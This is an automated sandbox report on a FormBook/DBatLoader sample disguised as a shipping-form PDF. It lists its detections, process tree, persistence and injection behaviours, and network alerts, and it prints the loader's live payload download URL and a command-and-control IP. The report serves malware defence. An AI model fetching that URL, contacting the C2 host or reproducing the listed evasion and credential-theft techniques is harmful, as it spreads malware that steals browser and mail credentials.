Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe

Overview

General Information

Sample name:Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Analysis ID:1580843
MD5:9e67c73f86b034d009280ab03db20124
SHA1:aba6a0de8e85cf5a84c0a158d3908189ecf29330
SHA256:b55cf6b5ec66fdc4dbbecc4e2f7698549964ec234bd0b55d057527d59d91147d
Tags:exeuser-TeamDreier
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe" MD5: 9E67C73F86B034D009280AB03DB20124)
    • cmd.exe (PID: 7032 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dxobknwL.pif (PID: 7124 cmdline: C:\Users\Public\Libraries\dxobknwL.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • IzFuULsBXSkS.exe (PID: 5016 cmdline: "C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 4084 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
          • IzFuULsBXSkS.exe (PID: 5684 cmdline: "C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7128 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • Lwnkboxd.PIF (PID: 3808 cmdline: "C:\Users\Public\Libraries\Lwnkboxd.PIF" MD5: 9E67C73F86B034D009280AB03DB20124)
    • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dxobknwL.pif (PID: 7144 cmdline: C:\Users\Public\Libraries\dxobknwL.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • IzFuULsBXSkS.exe (PID: 5572 cmdline: "C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 1904 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
  • Lwnkboxd.PIF (PID: 4476 cmdline: "C:\Users\Public\Libraries\Lwnkboxd.PIF" MD5: 9E67C73F86B034D009280AB03DB20124)
    • cmd.exe (PID: 4348 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dxobknwL.pif (PID: 4124 cmdline: C:\Users\Public\Libraries\dxobknwL.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.dxobknwL.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.dxobknwL.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.23a67a8.1.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  8.2.dxobknwL.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    8.2.dxobknwL.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 6 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\dxobknwL.pif, NewProcessName: C:\Users\Public\Libraries\dxobknwL.pif, OriginalFileName: C:\Users\Public\Libraries\dxobknwL.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ParentProcessId: 6600, ParentProcessName: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\dxobknwL.pif, ProcessId: 7124, ProcessName: dxobknwL.pif
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Lwnkboxd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lwnkboxd
                      Sigma detected: Parent in Public Folder Suspicious Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Lwnkboxd.PIF" , ParentImage: C:\Users\Public\Libraries\Lwnkboxd.PIF, ParentProcessId: 3808, ParentProcessName: Lwnkboxd.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6112, ProcessName: cmd.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Lwnkboxd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lwnkboxd
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\dxobknwL.pif, NewProcessName: C:\Users\Public\Libraries\dxobknwL.pif, OriginalFileName: C:\Users\Public\Libraries\dxobknwL.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ParentProcessId: 6600, ParentProcessName: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\dxobknwL.pif, ProcessId: 7124, ProcessName: dxobknwL.pif

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-26T11:52:01.872987+010020283713Unknown Traffic192.168.2.449731172.217.19.238443TCP
                      2024-12-26T11:52:04.721007+010020283713Unknown Traffic192.168.2.449732142.250.181.97443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-26T11:53:08.269717+010020507451Malware Command and Control Activity Detected192.168.2.449756199.59.243.22780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-26T11:53:08.269717+010028554651A Network Trojan was detected192.168.2.449756199.59.243.22780TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFReversingLabs: Detection: 63%
                      Multi AV Scanner detection for submitted file
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeVirustotal: Detection: 33%Perma Link
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeReversingLabs: Detection: 63%
                      Yara detected FormBook
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IzFuULsBXSkS.exe, 0000000F.00000000.2070567197.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915198433.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282039562.000000000065E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: dxobknwL.pif, 00000003.00000002.2212688667.000000002A1AE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2016612330.0000000029E60000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2004506026.0000000029CB2000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: dxobknwL.pif, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.0000000021672000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.00000000216A1000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000601000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.000000000093A000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.0000000000911000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029358B4

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49756 -> 199.59.243.227:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49756 -> 199.59.243.227:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294E2F8 InternetCheckConnectionA,0_2_0294E2F8
                      Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 142.250.181.97:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.217.19.238:443
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global trafficHTTP traffic detected: GET /download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
